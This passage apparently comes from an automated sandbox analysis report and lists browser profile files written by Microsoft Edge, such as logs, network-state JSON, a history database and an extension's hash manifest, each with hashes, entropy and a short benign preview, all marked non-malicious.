                                                                                                                                                                                                                                                                                                        Preview:2024/12/18-08:55:42.228 1eb4 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Scripts/MANIFEST-000001.2024/12/18-08:55:42.229 1eb4 Recovering log #3.2024/12/18-08:55:42.229 1eb4 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Scripts/000003.log .

                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension State\000003.log

                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):1254
                                                                                                                                                                                                                                                                                                        Entropy (8bit):1.8784775129881184
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:12:qWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWA:
                                                                                                                                                                                                                                                                                                        MD5:826B4C0003ABB7604485322423C5212A
                                                                                                                                                                                                                                                                                                        SHA1:6B8EF07391CD0301C58BB06E8DEDCA502D59BCB4
                                                                                                                                                                                                                                                                                                        SHA-256:C56783C3A6F28D9F7043D2FB31B8A956369F25E6CE6441EB7C03480334341A63
                                                                                                                                                                                                                                                                                                        SHA-512:0474165157921EA84062102743EE5A6AFE500F1F87DE2E87DBFE36C32CFE2636A0AE43D8946342740A843D5C2502EA4932623C609B930FE8511FE7356D4BAA9C
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Preview:.f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5........

                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension State\LOG

                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:ASCII text
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):322
                                                                                                                                                                                                                                                                                                        Entropy (8bit):5.171260232613203
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:6:7RQMccUq2PsZ23oH+Tcwt8NIFUt8ORQqi9Zmw+ORQqiPkwOsZ23oH+Tcwt8+eLJ:72MGvkcYebpFUt8O2D9/+O2DP51cYeb2
                                                                                                                                                                                                                                                                                                        MD5:FD3259F0271589A1A530C5EF154F43BB
                                                                                                                                                                                                                                                                                                        SHA1:151C9BF4F945A5EBA7F218533F52C4ACD67E7C26
                                                                                                                                                                                                                                                                                                        SHA-256:B6551CAFE7616E70B3E2ABBBE89607A6A3F327065AF1F060B0B3B3A8CA5A39FC
                                                                                                                                                                                                                                                                                                        SHA-512:EB45F5F09F31B6B3CE8EDE3A576870196E42121343855541E64BC0AA9712AD717B005D62F0423554E5F8D49F452F3BEDE2341E9A921A28B4A841066C7A9EFA42
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Preview:2024/12/18-08:55:33.399 1eb4 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension State/MANIFEST-000001.2024/12/18-08:55:33.400 1eb4 Recovering log #3.2024/12/18-08:55:33.400 1eb4 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension State/000003.log .

                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension State\LOG.old (copy)

                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:ASCII text
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):322
                                                                                                                                                                                                                                                                                                        Entropy (8bit):5.171260232613203
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:6:7RQMccUq2PsZ23oH+Tcwt8NIFUt8ORQqi9Zmw+ORQqiPkwOsZ23oH+Tcwt8+eLJ:72MGvkcYebpFUt8O2D9/+O2DP51cYeb2
                                                                                                                                                                                                                                                                                                        MD5:FD3259F0271589A1A530C5EF154F43BB
                                                                                                                                                                                                                                                                                                        SHA1:151C9BF4F945A5EBA7F218533F52C4ACD67E7C26
                                                                                                                                                                                                                                                                                                        SHA-256:B6551CAFE7616E70B3E2ABBBE89607A6A3F327065AF1F060B0B3B3A8CA5A39FC
                                                                                                                                                                                                                                                                                                        SHA-512:EB45F5F09F31B6B3CE8EDE3A576870196E42121343855541E64BC0AA9712AD717B005D62F0423554E5F8D49F452F3BEDE2341E9A921A28B4A841066C7A9EFA42
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Preview:2024/12/18-08:55:33.399 1eb4 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension State/MANIFEST-000001.2024/12/18-08:55:33.400 1eb4 Recovering log #3.2024/12/18-08:55:33.400 1eb4 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension State/000003.log .

                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension State\LOG.old~RF2f35f.TMP (copy)

                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:ASCII text
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):322
                                                                                                                                                                                                                                                                                                        Entropy (8bit):5.171260232613203
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:6:7RQMccUq2PsZ23oH+Tcwt8NIFUt8ORQqi9Zmw+ORQqiPkwOsZ23oH+Tcwt8+eLJ:72MGvkcYebpFUt8O2D9/+O2DP51cYeb2
                                                                                                                                                                                                                                                                                                        MD5:FD3259F0271589A1A530C5EF154F43BB
                                                                                                                                                                                                                                                                                                        SHA1:151C9BF4F945A5EBA7F218533F52C4ACD67E7C26
                                                                                                                                                                                                                                                                                                        SHA-256:B6551CAFE7616E70B3E2ABBBE89607A6A3F327065AF1F060B0B3B3A8CA5A39FC
                                                                                                                                                                                                                                                                                                        SHA-512:EB45F5F09F31B6B3CE8EDE3A576870196E42121343855541E64BC0AA9712AD717B005D62F0423554E5F8D49F452F3BEDE2341E9A921A28B4A841066C7A9EFA42
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Preview:2024/12/18-08:55:33.399 1eb4 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension State/MANIFEST-000001.2024/12/18-08:55:33.400 1eb4 Recovering log #3.2024/12/18-08:55:33.400 1eb4 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension State/000003.log .

                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\jmjflgjpcpepeafmmgdpfkogkghcpiha\1.2.1_0\_metadata\computed_hashes.json

                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):429
                                                                                                                                                                                                                                                                                                        Entropy (8bit):5.809210454117189
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:6:Y8U0vEjrAWT0VAUD9lpMXO4SrqiweVHUSENjrAWT0HQQ9/LZyVMQ3xqiweVHlrSQ:Y8U5j0pqCjJA7tNj0pHx/LZ4hcdQ
                                                                                                                                                                                                                                                                                                        MD5:5D1D9020CCEFD76CA661902E0C229087
                                                                                                                                                                                                                                                                                                        SHA1:DCF2AA4A1C626EC7FFD9ABD284D29B269D78FCB6
                                                                                                                                                                                                                                                                                                        SHA-256:B829B0DF7E3F2391BFBA70090EB4CE2BA6A978CCD665EEBF1073849BDD4B8FB9
                                                                                                                                                                                                                                                                                                        SHA-512:5F6E72720E64A7AC19F191F0179992745D5136D41DCDC13C5C3C2E35A71EB227570BD47C7B376658EF670B75929ABEEBD8EF470D1E24B595A11D320EC1479E3C
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Preview:{"file_hashes":[{"block_hashes":["OdZL4YFLwCTKbdslekC6/+U9KTtDUk+T+nnpVOeRzUc=","6RbL+qKART8FehO4s7U0u67iEI8/jaN+8Kg3kII+uy4=","CuN6+RcZAysZCfrzCZ8KdWDkQqyaIstSrcmsZ/c2MVs="],"block_size":4096,"path":"content.js"},{"block_hashes":["OdZL4YFLwCTKbdslekC6/+U9KTtDUk+T+nnpVOeRzUc=","UL53sQ5hOhAmII/Yx6muXikzahxM+k5gEmVOh7xJ3Rw=","u6MdmVNzBUfDzMwv2LEJ6pXR8k0nnvpYRwOL8aApwP8="],"block_size":4096,"path":"content_new.js"}],"version":2}

                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\GPUCache\data_1

                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):270336
                                                                                                                                                                                                                                                                                                        Entropy (8bit):0.0018238520723782249
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:3:MsEllllkEthXllkl2zEfl+q:/M/xT02z7q
                                                                                                                                                                                                                                                                                                        MD5:01CC6E02A6A8AACA06EDFE7460E1E085
                                                                                                                                                                                                                                                                                                        SHA1:F6606FD6600C8D0FC5EAA51FEBF8F441BE83E456
                                                                                                                                                                                                                                                                                                        SHA-256:BECBDBC7C0DEA5FF08AAAD7F6918769416C485C2F16D457A970C7CC6945F3F37
                                                                                                                                                                                                                                                                                                        SHA-512:876988B01FADDBBC0A1F1BB4A69B23A0697A549E5D7AB1EC7ED46E458C25FD4D763D90EA64D6264B9CB4D2062EBABF4933BB21FB0B9CE92B2E34A5CDE996BA66
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History

                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 2, database pages 38, cookie 0x1f, schema 4, UTF-8, version-valid-for 2
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):155648
                                                                                                                                                                                                                                                                                                        Entropy (8bit):0.5732213252375334
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:96:+buWyejzH+bDoYysX0IxQzpkHtpVJNlYDLjGQLBE3CeE0kEh//:+ThH+bDo3iN0p2TVJkXBBE3ybOH
                                                                                                                                                                                                                                                                                                        MD5:91861C0F39F82E5AA622BFEBC75751EE
                                                                                                                                                                                                                                                                                                        SHA1:2C0EFE74C0E80B9CE134A1803DEB2245C87608FF
                                                                                                                                                                                                                                                                                                        SHA-256:90CFB602EFD7AEF00A7A09AAC0EF9059FDC922664FF4E60A3CBE1EFA330B1D37
                                                                                                                                                                                                                                                                                                        SHA-512:C74F32DBB654C05B5DB2C246D885E394F7C842F00357D71E34552FE586C780409CB0FD53A5976EA5C28DAF5A171718B6BEC3221A3462BEDCCC04288B1ECC180C
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Preview:SQLite format 3......@ .......&..................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb\LOG

                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:ASCII text
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):331
                                                                                                                                                                                                                                                                                                        Entropy (8bit):5.141503223075537
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:6:7RQEWTL+q2PsZ23oH+Tcwt8a2jMGIFUt8ORQEW2oKWZmw+ORQEWCjLVkwOsZ23oL:72rL+vkcYeb8EFUt8O2qW/+O2ajLV51t
                                                                                                                                                                                                                                                                                                        MD5:30FF39B6FA26BFC427BA12ABDD8F034F
                                                                                                                                                                                                                                                                                                        SHA1:3A51640FCF9BFC598B3DCCA7B2958CFF56F0E8C6
                                                                                                                                                                                                                                                                                                        SHA-256:96571C4AE728CDDCD969D5C330B220056EB1299609D5319BCE3A9CB65D7F26CD
                                                                                                                                                                                                                                                                                                        SHA-512:F6429EA38E0C844C908ED3DCE9E5B6135E683CB5DA96B0EF8490F05C62A00B7375A1BB139B4E6699A58D347DE5CE96FF65C047217D2582F58E78E68968C6B584
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Preview:2024/12/18-08:55:34.350 53c Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb/MANIFEST-000001.2024/12/18-08:55:34.352 53c Recovering log #3.2024/12/18-08:55:34.355 53c Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb/000003.log .

                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb\LOG.old (copy)

                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:ASCII text
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):331
                                                                                                                                                                                                                                                                                                        Entropy (8bit):5.141503223075537
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:6:7RQEWTL+q2PsZ23oH+Tcwt8a2jMGIFUt8ORQEW2oKWZmw+ORQEWCjLVkwOsZ23oL:72rL+vkcYeb8EFUt8O2qW/+O2ajLV51t
                                                                                                                                                                                                                                                                                                        MD5:30FF39B6FA26BFC427BA12ABDD8F034F
                                                                                                                                                                                                                                                                                                        SHA1:3A51640FCF9BFC598B3DCCA7B2958CFF56F0E8C6
                                                                                                                                                                                                                                                                                                        SHA-256:96571C4AE728CDDCD969D5C330B220056EB1299609D5319BCE3A9CB65D7F26CD
                                                                                                                                                                                                                                                                                                        SHA-512:F6429EA38E0C844C908ED3DCE9E5B6135E683CB5DA96B0EF8490F05C62A00B7375A1BB139B4E6699A58D347DE5CE96FF65C047217D2582F58E78E68968C6B584
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Preview:2024/12/18-08:55:34.350 53c Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb/MANIFEST-000001.2024/12/18-08:55:34.352 53c Recovering log #3.2024/12/18-08:55:34.355 53c Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb/000003.log .

                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb\LOG.old~RF2f6f8.TMP (copy)

                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:ASCII text
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):331
                                                                                                                                                                                                                                                                                                        Entropy (8bit):5.141503223075537
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:6:7RQEWTL+q2PsZ23oH+Tcwt8a2jMGIFUt8ORQEW2oKWZmw+ORQEWCjLVkwOsZ23oL:72rL+vkcYeb8EFUt8O2qW/+O2ajLV51t
                                                                                                                                                                                                                                                                                                        MD5:30FF39B6FA26BFC427BA12ABDD8F034F
                                                                                                                                                                                                                                                                                                        SHA1:3A51640FCF9BFC598B3DCCA7B2958CFF56F0E8C6
                                                                                                                                                                                                                                                                                                        SHA-256:96571C4AE728CDDCD969D5C330B220056EB1299609D5319BCE3A9CB65D7F26CD
                                                                                                                                                                                                                                                                                                        SHA-512:F6429EA38E0C844C908ED3DCE9E5B6135E683CB5DA96B0EF8490F05C62A00B7375A1BB139B4E6699A58D347DE5CE96FF65C047217D2582F58E78E68968C6B584
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Preview:2024/12/18-08:55:34.350 53c Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb/MANIFEST-000001.2024/12/18-08:55:34.352 53c Recovering log #3.2024/12/18-08:55:34.355 53c Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb/000003.log .

                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\0b58e663-f905-435a-9a12-46239b423ade.tmp

                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):40
                                                                                                                                                                                                                                                                                                        Entropy (8bit):4.1275671571169275
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:3:Y2ktGMxkAXWMSN:Y2xFMSN
                                                                                                                                                                                                                                                                                                        MD5:20D4B8FA017A12A108C87F540836E250
                                                                                                                                                                                                                                                                                                        SHA1:1AC617FAC131262B6D3CE1F52F5907E31D5F6F00
                                                                                                                                                                                                                                                                                                        SHA-256:6028BD681DBF11A0A58DDE8A0CD884115C04CAA59D080BA51BDE1B086CE0079D
                                                                                                                                                                                                                                                                                                        SHA-512:507B2B8A8A168FF8F2BDAFA5D9D341C44501A5F17D9F63F3D43BD586BC9E8AE33221887869FA86F845B7D067CB7D2A7009EFD71DDA36E03A40A74FEE04B86856
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Preview:{"SDCH":{"dictionaries":{},"version":2}}

                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\0ecd005d-d399-453c-8a43-e421f2cdcd46.tmp

                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):2
                                                                                                                                                                                                                                                                                                        Entropy (8bit):1.0
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:3:H:H
                                                                                                                                                                                                                                                                                                        MD5:D751713988987E9331980363E24189CE
                                                                                                                                                                                                                                                                                                        SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                                                                                                                                                                                                                                        SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                                                                                                                                                                                                                        SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Preview:[]

                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\2cda0849-b00f-4fb4-bb26-dad0121a8283.tmp

                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):2
                                                                                                                                                                                                                                                                                                        Entropy (8bit):1.0
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:3:H:H
                                                                                                                                                                                                                                                                                                        MD5:D751713988987E9331980363E24189CE
                                                                                                                                                                                                                                                                                                        SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                                                                                                                                                                                                                                        SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                                                                                                                                                                                                                        SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Preview:[]

                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\7cb0a7da-afb9-4947-b62b-3d325ba227ff.tmp

                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):111
                                                                                                                                                                                                                                                                                                        Entropy (8bit):4.718418993774295
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:3:YLb9N+eAXRfHDH2LS7PMVKJq0nMb1KKqk1Yn:YHpoeS7PMVKJTnMRKXk1Yn
                                                                                                                                                                                                                                                                                                        MD5:807419CA9A4734FEAF8D8563A003B048
                                                                                                                                                                                                                                                                                                        SHA1:A723C7D60A65886FFA068711F1E900CCC85922A6
                                                                                                                                                                                                                                                                                                        SHA-256:AA10BF07B0D265BED28F2A475F3564D8DDB5E4D4FFEE0AB6F3A0CC564907B631
                                                                                                                                                                                                                                                                                                        SHA-512:F10D496AE75DB5BA412BD9F17BF0C7DA7632DB92A3FABF7F24071E40F5759C6A875AD8F3A72BAD149DA58B3DA3B816077DF125D0D9F3544ADBA68C66353D206C
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Preview:{"net":{"http_server_properties":{"servers":[],"version":5},"network_qualities":{"CAESABiAgICA+P////8B":"3G"}}}

                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Network Persistent State (copy)

                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):61
                                                                                                                                                                                                                                                                                                        Entropy (8bit):3.926136109079379
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:3:YLb9N+eAXRfHDH2LSL:YHpoeSL
                                                                                                                                                                                                                                                                                                        MD5:4DF4574BFBB7E0B0BC56C2C9B12B6C47
                                                                                                                                                                                                                                                                                                        SHA1:81EFCBD3E3DA8221444A21F45305AF6FA4B71907
                                                                                                                                                                                                                                                                                                        SHA-256:E1B77550222C2451772C958E44026ABE518A2C8766862F331765788DDD196377
                                                                                                                                                                                                                                                                                                        SHA-512:78B14F60F2D80400FE50360CF303A961685396B7697775D078825A29B717081442D357C2039AD0984D4B622976B0314EDE8F478CDE320DAEC118DA546CB0682A
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Preview:{"net":{"http_server_properties":{"servers":[],"version":5}}}

                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Network Persistent State~RF3206a.TMP (copy)

                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):61
                                                                                                                                                                                                                                                                                                        Entropy (8bit):3.926136109079379
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:3:YLb9N+eAXRfHDH2LSL:YHpoeSL
                                                                                                                                                                                                                                                                                                        MD5:4DF4574BFBB7E0B0BC56C2C9B12B6C47
                                                                                                                                                                                                                                                                                                        SHA1:81EFCBD3E3DA8221444A21F45305AF6FA4B71907
                                                                                                                                                                                                                                                                                                        SHA-256:E1B77550222C2451772C958E44026ABE518A2C8766862F331765788DDD196377
                                                                                                                                                                                                                                                                                                        SHA-512:78B14F60F2D80400FE50360CF303A961685396B7697775D078825A29B717081442D357C2039AD0984D4B622976B0314EDE8F478CDE320DAEC118DA546CB0682A
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Preview:{"net":{"http_server_properties":{"servers":[],"version":5}}}

                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Network Persistent State~RF41559.TMP (copy)

                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):61
                                                                                                                                                                                                                                                                                                        Entropy (8bit):3.926136109079379
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:3:YLb9N+eAXRfHDH2LSL:YHpoeSL
                                                                                                                                                                                                                                                                                                        MD5:4DF4574BFBB7E0B0BC56C2C9B12B6C47
                                                                                                                                                                                                                                                                                                        SHA1:81EFCBD3E3DA8221444A21F45305AF6FA4B71907
                                                                                                                                                                                                                                                                                                        SHA-256:E1B77550222C2451772C958E44026ABE518A2C8766862F331765788DDD196377
                                                                                                                                                                                                                                                                                                        SHA-512:78B14F60F2D80400FE50360CF303A961685396B7697775D078825A29B717081442D357C2039AD0984D4B622976B0314EDE8F478CDE320DAEC118DA546CB0682A
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Preview:{"net":{"http_server_properties":{"servers":[],"version":5}}}

                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\SCT Auditing Pending Reports (copy)

                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                        Size (bytes):2
                                                                                                                                                                                                                                                                                                        Entropy (8bit):1.0
                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                        SSDEEP:3:H:H
                                                                                                                                                                                                                                                                                                        MD5:D751713988987E9331980363E24189CE
                                                                                                                                                                                                                                                                                                        SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                                                                                                                                                                                                                                        SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                                                                                                                                                                                                                        SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                        Preview:[]

